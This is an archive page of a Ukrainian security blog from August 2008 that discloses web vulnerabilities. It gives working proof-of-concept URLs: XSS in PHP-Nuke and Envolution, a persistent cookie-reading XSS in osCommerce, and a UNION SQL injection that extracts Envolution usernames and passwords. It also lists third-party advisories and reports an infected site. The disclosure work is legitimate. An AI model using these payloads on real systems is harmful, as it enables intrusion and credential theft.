Архів для категорії 'Уразливості'

XSS уразливість в PHP-Nuke

23:55 25.08.2008

Учора, 24.08.2008, я знайшов нову Cross-Site Scripting уразливість в системі PHP-Nuke. Дірку я виявив на одному сайті, що використовує даний движок. Уразливість працює лише в старих версіях PHP-Nuke, бо як я перевірив на різних сайтах (в тому числі на phpnuke.org), в останніх версіях (на 8.х) вона не працює.

Раніше я вже писав про уразливості в PHP-Nuke.

XSS:

http://site/modules.php?name=News&file=print&sid=%3Cscript%20src=http://site/script.js%20

Уразлива версія PHP-Nuke 7.0 та попередні версії.

Уразливості на www.banner.kiev.ua

19:33 25.08.2008

21.03.2008

У вересні, 01.09.2007, я знайшов Cross-Site Scripting уразливості на проекті http://www.banner.kiev.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

25.08.2008

XSS (IE):

Дані уразливості досі не виправлені.

Нові уразливості в Envolution

23:58 23.08.2008

Нещодавно, 17.08.2008, після попередніх уразливостей в Envolution, я знайшов нові Full path disclosure та SQL Injection уразливості в системі Envolution. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Full path disclosure:

http://site/index.php?module=Errore&type=admin&op=noexist&modname=%22
http://site/index.php?module=Errore&type=admin&op=%22
http://site/index.php?module=Errore&type=%22
http://site/index.php?module=%22
http://site/print.php?sid=%22
http://site/modules.php?op=modload&file=%22
http://site/modules.php?op=modload&name=News&file=article&sid=%22
http://site/modules.php?op=modload&name=Recommend_Us&file=index&req=%22
http://site/modules.php?op=modload&name=%22

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,pn_uname,pn_pass,null,null,null,null%20from%20envo_users%20limit%201,1

Уразлива версія Envolution 1.2.0 та попередні версії.

Добірка уразливостей

17:31 23.08.2008

В даній добірці уразливості в веб додатках:

  • Moonware Software Multiple Vulnerabilities (деталі)
  • Abledesign Dynamic Picture Frame XSS (деталі)
  • InterWorx-CP Multiple HTML Injections Vulnerabilitie (деталі)
  • Sunshop v4.0 <= Blind SQL Injection exploit (деталі)
  • SQL-ін’єкція в ActiveKB v1.5 (деталі)
  • DVD Rental System multiple XSS and CSRF vulnerabilities (деталі)
  • Gallery In A Box Username & Password Parameters SQL Injection (деталі)
  • Next Gen Portfolio Manager SQL Injection (деталі)
  • la-nai cms_v1.2.14 - Remote SQL Injection (деталі)
  • PHP remote file inclusion vulnerability in Jupiter CMS 1.1.5 (деталі)

Уразливість в osCommerce

20:28 22.08.2008

03.07.2008

У листопаді, 02.11.2007, я знайшов Cross-Site Scripting (причому persistent) в системі osCommerce. Як раз коли виявив уразливість на bezpeka-shop.com, де і використовується цей движок.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам системи.

22.08.2008

XSS:

POST запит на сторінці http://site/shopping_cart.php
<script>alert(document.cookie)</script>В полі Количество.

Після ін’єкції коду, він спрацьовує на кожній сторінці сайта (persistent XSS).

Добірка уразливостей

17:24 21.08.2008

В даній добірці уразливості в веб додатках:

  • PHP Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability (0dd exploit) (деталі)
  • eXV2.de Browser Cookie is not properly sanitised (деталі)
  • JobLister3 SQL injection vulnerabilities (деталі)
  • Neuron Blog Admin Permission Bypass and Remote File Upload Vulnerability (деталі)
  • PHPCentral Poll Script Remote Command Execution Vulnerability (деталі)
  • PHPCentral Login Script Remote Command Execution Vulnerability (деталі)
  • eyeOS checksum prediction (деталі)
  • PhpGedView login page multiple XSS (деталі)
  • ePersonnel_RC_2004 Remote File Bug (деталі)
  • Directory traversal vulnerability in Jupiter CMS 1.1.5 (деталі)

Уразливість на www.myvi.ru

21:32 20.08.2008

15.03.2008

У серпні, 24.08.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.myvi.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

20.08.2008

XSS:

Дана уразливість вже виправлена.

Нові уразливості в Envolution

23:56 19.08.2008

Нещодавно, 17.08.2008, після попередніх уразливостей в Envolution, я знайшов нові Full path disclosure та Cross-Site Scripting уразливості в системі Envolution. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Full path disclosure:

http://site/user.php?module=%22
http://site/user.php?uname=%22
http://site/user.php?upass=%22
http://site/user.php?upassverif=%22
http://site/user.php?email=%22
http://site/user.php?name=%22
http://site/user.php?url=%22
http://site/user.php?timezoneoffset=%22
http://site/user.php?user_avatar=%22
http://site/user.php?user_icq=%22
http://site/user.php?user_aim=%22
http://site/user.php?user_yyim=%22
http://site/user.php?user_msnm=%22
http://site/user.php?user_from=%22
http://site/user.php?user_occ=%22
http://site/user.php?user_intrest=%22
http://site/user.php?user_sig=%22
http://site/user.php?bio=%22
http://site/user.php?agreetoterms=%22
http://site/user.php?femail=%22
http://site/user.php?user_viewemail=%22

XSS:

http://site/print.php?sid=0%2f%2a%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразлива версія Envolution 1.2.0 та попередні версії.

Сайт hip.org.ua інфікований

20:12 19.08.2008

Мені періодично доводиться зіштовхуватися з інфікованими сайтами в Інтернеті, в тому числі й в Уанеті. Взломи сайтів з метою розміщення на них шкідливих кодів стають все більш поширеними з кожним роком. Зазначу, що в своїй статті про стан зараженості Уанета, я приводив дані про стан зараженості Уанета в попередні роки та зпрогнозував стан на 2008 рік.

Раніше я писав про інфікований сайт dn.kiev.ua. Даний сайт був інфіковавний тривалий час - після виявлення мною шкідливого коду на сайті й повідомлення адмінам, довгий час вони не прибирали шкідливий код (проігнорувавши моє попередження і продовжуючи заражати шкідливим кодом відвідувачів сайта). Лише нещодавно вони врешті решт видалили шкідливий код з сайта.

Зараз розповім про ще один заражений сайт. Нещодавно, 17.08.2008, використовуючи Гугл, я виявив, що сайт hip.org.ua інфікований. Раніше мені доводилося чути про цей сайт, і під час пошуку в Гуглі він мені траплявся, але раніше він не був інфікований. Зараз же Google заявив, що “Ця сторінка може заподіяти шкоду вашому комп’ютерові”. Звісно Гугл може й помилятися з такими ярликами, але частіше все ж таки вони вірно відмічають інфіковані сайти.

Після того, як я сам перевірив “Персональний блог Hip” http://hip.org.ua, я впевнився, що він інфікований. На даному сайті розміщений шкідливий іфрейм, що містить велику кількість експлоітів (в зашифрованому вигляді). До речі, іфрейм веде на сторінку з експлоітами, що розміщена на сайті, що має китайський хостинг (причому Пекінський). Схоже, що блог Hip’а взломали з приводу Олімпіади :-) .

Адміну hip.org.ua варто витерти шкідливий код зі свого сайта і почати серйозно слідкувати за безпекою власного сайта. Це варто робити всім блогерам, як і власникам будь-яких сайтів.

Добірка уразливостей

16:29 19.08.2008

В даній добірці уразливості в веб додатках:

  • phpCoupon Vulnerabilities (деталі)
  • PHPBlogger cookie privilege escalation (деталі)
  • Information Leakage in PHPBlogger (деталі)
  • Message Board / Threaded Discussion Forum SQL INJECTION (деталі)
  • Pay Roll - Time Sheet and Punch Card Application With Web Interface SQL Injection (деталі)
  • Real Estate listing website application template SQL Injection (деталі)
  • WebStore - Online Store Application Template SQL INJECTION (деталі)
  • Berthanas Ziyaretci Defteri v2.0 (tr) Sql (деталі)
  • DeskPRO Admin Panel Multiple HTML Injections (деталі)
  • Jupiter CMS 1.1.5 (Client-IP) Remote SQL Injection Exploit (деталі)